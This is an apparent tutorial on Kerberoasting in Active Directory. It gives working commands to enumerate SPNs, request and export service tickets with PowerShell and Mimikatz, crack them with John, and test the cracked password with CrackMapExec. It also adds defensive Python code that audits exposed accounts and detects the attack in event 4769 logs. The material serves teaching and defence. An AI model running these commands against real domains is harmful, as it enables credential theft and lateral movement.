What You Need to Know About Kerberoasting

Kerberoasting is a method of extracting the NTLM password hashes of service accounts. It works because any domain-authenticated user can request service tickets (TGS) for service accounts within the domain, and each TGS is encrypted with the service account's NTLM hash. Exploitation is straightforward:

  • Enumerate Service Principal Names (SPNs) for services
  • Request TGS tickets for the accounts
  • Crack the NTLM hashes offline

Test Environment Setup

To try Kerberoasting in a non-production environment, create a user in Active Directory with the account name “spntest”. Set the account password to something that could be brute-forced.

Configure an SPN for the account with the following command:

setspn -A spntest/WIN-SI6N6K2RCAE:80 spntest
Registering ServicePrincipalNames for CN=spntest,CN=Users,DC=bgtest,DC=local
        spntest/WIN-SI6N6K2RCAE:80
Updated object

Enumerating Service Principal Names

From an endpoint, enumerate existing SPNs using the following command:

setspn -q */*
Checking domain DC=bgtest,DC=local
CN=WIN-SI6N6K2RCAE,OU=Domain Controllers,DC=bgtest,DC=local
        ldap/WIN-SI6N6K2RCAE.bgtest.local/ForestDnsZones.bgtest.local
        ldap/WIN-SI6N6K2RCAE.bgtest.local/DomainDnsZones.bgtest.local
        NtFrs-88f5d2bd-b646-11d2-a6d3-00c04fc9b232/WIN-SI6N6K2RCAE.bgtest.local
        DNS/WIN-SI6N6K2RCAE.bgtest.local
        GC/WIN-SI6N6K2RCAE.bgtest.local/bgtest.local
        RestrictedKrbHost/WIN-SI6N6K2RCAE.bgtest.local
        RestrictedKrbHost/WIN-SI6N6K2RCAE
        HOST/WIN-SI6N6K2RCAE/BGTEST
        HOST/WIN-SI6N6K2RCAE.bgtest.local/BGTEST
        HOST/WIN-SI6N6K2RCAE
        HOST/WIN-SI6N6K2RCAE.bgtest.local
        HOST/WIN-SI6N6K2RCAE.bgtest.local/bgtest.local
        ldap/WIN-SI6N6K2RCAE/BGTEST
        ldap/WIN-SI6N6K2RCAE.bgtest.local/BGTEST
        ldap/WIN-SI6N6K2RCAE
        ldap/WIN-SI6N6K2RCAE.bgtest.local
        ldap/WIN-SI6N6K2RCAE.bgtest.local/bgtest.local
CN=krbtgt,CN=Users,DC=bgtest,DC=local
        kadmin/changepw
        TERMSRV/CLIENT1
        TERMSRV/CLIENT1.bgtest.local
        RestrictedKrbHost/CLIENT1
        HOST/CLIENT1
        RestrictedKrbHost/CLIENT1.bgtest.local
        HOST/CLIENT1.bgtest.local
        TERMSRV/CLIENT2
        TERMSRV/Client2.bgtest.local
        RestrictedKrbHost/CLIENT2
        HOST/CLIENT2
        RestrictedKrbHost/CLIENT2.bgtest.local
        HOST/CLIENT2.bgtest.local
CN=spntest,CN=Users,DC=bgtest,DC=local
        spntest/WIN-SI6N6K2RCAE:80
Existing SPN found!
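The listing above is what an attacker sees, but it is also the inventory a defender should be reviewing: every user account (not computer account) with an SPN is a Kerberoasting target, and the risk is highest where RC4 is still permitted, the password is old, or the account is privileged. The audit below is an added example written for this article, not code from the original post or from any of the tools it mentions. It runs over constructed sample records shaped like the AD attributes a defender would export (sAMAccountName, objectClass, servicePrincipalName, msDS-SupportedEncryptionTypes, pwdLastSet, adminCount); the account names other than spntest and the timestamps are invented for the example.

```python
"""Audit of Active Directory accounts exposed to Kerberoasting.

The records below are constructed samples shaped like the attributes a
defender would pull from AD; nothing here reads a live directory.
"""
from datetime import datetime, timedelta, timezone

# Bit values of the msDS-SupportedEncryptionTypes attribute.
RC4_HMAC = 0x4
AES128 = 0x8
AES256 = 0x10


def audit_spn_accounts(accounts, now, max_password_age_days=365):
    """Return one finding per user account that carries an SPN, with the
    reasons it is a Kerberoasting risk. Computer accounts and group managed
    service accounts are skipped: their passwords are long, random and
    rotated automatically, so their tickets are not practically crackable."""
    findings = []
    for acct in accounts:
        if not acct.get("servicePrincipalName"):
            continue
        if acct["objectClass"] in ("computer", "msDS-GroupManagedServiceAccount"):
            continue
        reasons = []
        enc = acct.get("msDS-SupportedEncryptionTypes") or 0
        if enc == 0:
            reasons.append("msDS-SupportedEncryptionTypes unset: KDC uses the domain "
                           "default, which still permits RC4 unless hardened")
        else:
            if enc & RC4_HMAC:
                reasons.append("RC4-HMAC permitted: ticket keyed directly by the unsalted NT hash")
            if not enc & (AES128 | AES256):
                reasons.append("AES not permitted: slower PBKDF2-derived keys cannot be used")
        age = now - acct["pwdLastSet"]          # pwdLastSet already converted from FILETIME
        if age > timedelta(days=max_password_age_days):
            reasons.append(f"password last set {age.days} days ago")
        if acct.get("adminCount") == 1:
            reasons.append("privileged (adminCount=1): a cracked password yields admin access")
        findings.append({
            "account": acct["sAMAccountName"],
            "spns": list(acct["servicePrincipalName"]),
            "reasons": reasons,
        })
    # Worst offenders first: most reasons, then alphabetical for a stable report.
    findings.sort(key=lambda f: (-len(f["reasons"]), f["account"]))
    return findings


NOW = datetime(2024, 1, 15, tzinfo=timezone.utc)   # constructed reference time

# Constructed sample records (only spntest and its SPN come from the article).
SAMPLE_ACCOUNTS = [
    {"sAMAccountName": "spntest", "objectClass": "user",
     "servicePrincipalName": ["spntest/WIN-SI6N6K2RCAE:80"],
     "pwdLastSet": NOW - timedelta(days=2)},
    {"sAMAccountName": "svc_sql", "objectClass": "user",
     "servicePrincipalName": ["MSSQLSvc/sql01.bgtest.local:1433"],
     "msDS-SupportedEncryptionTypes": RC4_HMAC,
     "pwdLastSet": NOW - timedelta(days=900), "adminCount": 1},
    {"sAMAccountName": "svc_web", "objectClass": "user",
     "servicePrincipalName": ["HTTP/web01.bgtest.local"],
     "msDS-SupportedEncryptionTypes": AES128 | AES256,
     "pwdLastSet": NOW - timedelta(days=30)},
    {"sAMAccountName": "CLIENT1$", "objectClass": "computer",
     "servicePrincipalName": ["HOST/CLIENT1"],
     "pwdLastSet": NOW - timedelta(days=10)},
    {"sAMAccountName": "gmsa_app$", "objectClass": "msDS-GroupManagedServiceAccount",
     "servicePrincipalName": ["HTTP/app01.bgtest.local"],
     "pwdLastSet": NOW - timedelta(days=10)},
]

if __name__ == "__main__":
    for finding in audit_spn_accounts(SAMPLE_ACCOUNTS, NOW):
        print(finding["account"], finding["spns"])
        for reason in finding["reasons"]:
            print("   -", reason)
```

In a real estate the same records come from an LDAP query for (&(objectClass=user)(servicePrincipalName=*)). An account such as svc_web, which appears with no reasons, is still a target; it simply forces the attacker through the much slower AES key derivation, which is why the usual remediations are moving services to gMSAs, setting long random passwords on the user accounts that must stay, and removing RC4 from msDS-SupportedEncryptionTypes.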

Extracting Hashes

There are a number of methods to extract the account hashes.

PowerShell with Mimikatz

Retrieve the tickets using PowerShell:

Add-Type -AssemblyName System.IdentityModel
New-Object System.IdentityModel.Tokens.KerberosRequestorSecurityToken -ArgumentList 'spntest/WIN-SI6N6K2RCAE:80'

With the tickets now in memory, Mimikatz can dump them to file:

kerberos::list /export

The exported tickets can then be taken offline, converted to John the Ripper format, and cracked using John:

/usr/share/john/kirbi2john.py 1-40a00000-alice@spntest~WIN-SI6N6K2RCAE~80-BGTEST.LOCAL.kirbi > spntest_ticket.txt

john spntest_ticket.txt

John's output shows that the password for the spntest account is “Password1”.

PowerShell Empire

PowerShell Empire includes the Invoke-Kerberoast module, which returns one object per SPN account:

TicketByteHexStream  :
Hash                 : <hash string; not legible in the captured output>
SamAccountName       : spntest
DistinguishedName    : CN=spntest,CN=Users,DC=bgtest,DC=local
ServicePrincipalName : spntest/WIN-SI6N6K2RCAE:80

Native Executable

Rubeus is a C# Win32 executable which can also extract the hashes, in a format similar to that of Invoke-Kerberoast.

With this process complete, we can use CrackMapExec to verify which systems the credentials work on:

crackmapexec smb 172.16.16.200/29 -d BGTEST -u spntest -p Password1
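Every technique in the Extracting Hashes section, whether the KerberosRequestorSecurityToken call, Invoke-Kerberoast or Rubeus, has to ask the domain controller for a service ticket, and the DC records each request as Security event 4769 with the requesting account, the service name and the ticket encryption type. Two signals stand out: a service ticket for a user account issued with RC4 (encryption type 0x17) rather than AES, and one principal requesting tickets for many distinct SPNs in a short window, which is what a bulk run of Invoke-Kerberoast looks like. The detection below is an added example written for this article, not code from the original post or from any tool it mentions. It runs over constructed sample events that use the real 4769 field names; the user names, client address and timestamps are invented, and only the spntest service name comes from the article.

```python
"""Detection of Kerberoasting patterns in Windows Security event 4769
(A Kerberos service ticket was requested).

The events below are constructed samples that reuse the real 4769 field
names; they were not exported from a domain controller.
"""
from collections import defaultdict
from datetime import datetime, timedelta

# RC4-HMAC (0x17) and RC4-HMAC-EXP (0x18): the ticket is keyed by the NT hash.
RC4_ETYPES = {"0x17", "0x18"}


def is_roastable_service(service_name):
    """Computer accounts end in '$' and have random 120+ character passwords;
    krbtgt requests are TGT operations. Neither is a Kerberoasting target."""
    return not service_name.endswith("$") and service_name.lower() != "krbtgt"


def detect_kerberoasting(events, burst_threshold=3, window=timedelta(minutes=5)):
    """Return alerts for (a) successful RC4 service tickets for user-account
    SPNs and (b) one requester touching >= burst_threshold distinct SPNs
    inside a sliding time window."""
    alerts = []
    per_user = defaultdict(list)
    for ev in events:
        if ev["EventID"] != 4769 or ev.get("FailureCode", "0x0") != "0x0":
            continue                      # only successful TGS issuance matters
        if not is_roastable_service(ev["ServiceName"]):
            continue
        if ev["TicketEncryptionType"] in RC4_ETYPES:
            alerts.append({"rule": "rc4_service_ticket", "user": ev["AccountName"],
                           "service": ev["ServiceName"], "client": ev["ClientAddress"]})
        per_user[ev["AccountName"]].append(
            (datetime.fromisoformat(ev["TimeCreated"]), ev["ServiceName"]))

    for user, reqs in per_user.items():
        reqs.sort()
        start = 0
        for end in range(len(reqs)):
            while reqs[end][0] - reqs[start][0] > window:
                start += 1                # slide the window forward in time
            distinct = {svc for _, svc in reqs[start:end + 1]}
            if len(distinct) >= burst_threshold:
                alerts.append({"rule": "spn_burst", "user": user,
                               "services": sorted(distinct)})
                break                     # one burst alert per user is enough
    return alerts


def _ev(ts, user, service, etype, client="172.16.16.50", failure="0x0"):
    return {"EventID": 4769, "TimeCreated": ts, "AccountName": user,
            "ServiceName": service, "TicketEncryptionType": etype,
            "ClientAddress": client, "FailureCode": failure}


# Constructed sample log: alice bulk-requests three SPNs with RC4 in two
# seconds, dave requests two RC4 tickets hours apart, the rest is benign.
SAMPLE_EVENTS = [
    _ev("2024-01-15T10:00:00", "alice@BGTEST.LOCAL", "spntest", "0x17"),
    _ev("2024-01-15T10:00:01", "alice@BGTEST.LOCAL", "svc_sql", "0x17"),
    _ev("2024-01-15T10:00:02", "alice@BGTEST.LOCAL", "svc_web", "0x17"),
    _ev("2024-01-15T10:05:00", "bob@BGTEST.LOCAL", "CLIENT1$", "0x12", "172.16.16.51"),
    _ev("2024-01-15T10:06:00", "carol@BGTEST.LOCAL", "krbtgt", "0x12", "172.16.16.52"),
    _ev("2024-01-15T14:30:00", "dave@BGTEST.LOCAL", "spntest", "0x17", "172.16.16.53"),
    _ev("2024-01-15T16:00:00", "dave@BGTEST.LOCAL", "svc_web", "0x17", "172.16.16.53"),
    _ev("2024-01-15T16:01:00", "erin@BGTEST.LOCAL", "svc_web", "0x12", "172.16.16.54", "0x1b"),
]

if __name__ == "__main__":
    for alert in detect_kerberoasting(SAMPLE_EVENTS):
        print(alert)
```

The RC4 rule is the one that catches the exact request shown earlier on this page, because the spntest account was created without AES enabled; in an environment where legacy applications still legitimately use RC4 it needs an allow-list, and the burst rule's threshold and window need tuning against normal logon-time ticket volume. Removing RC4 from service accounts, as the audit earlier suggests, has the side effect of making the first rule nearly noise-free.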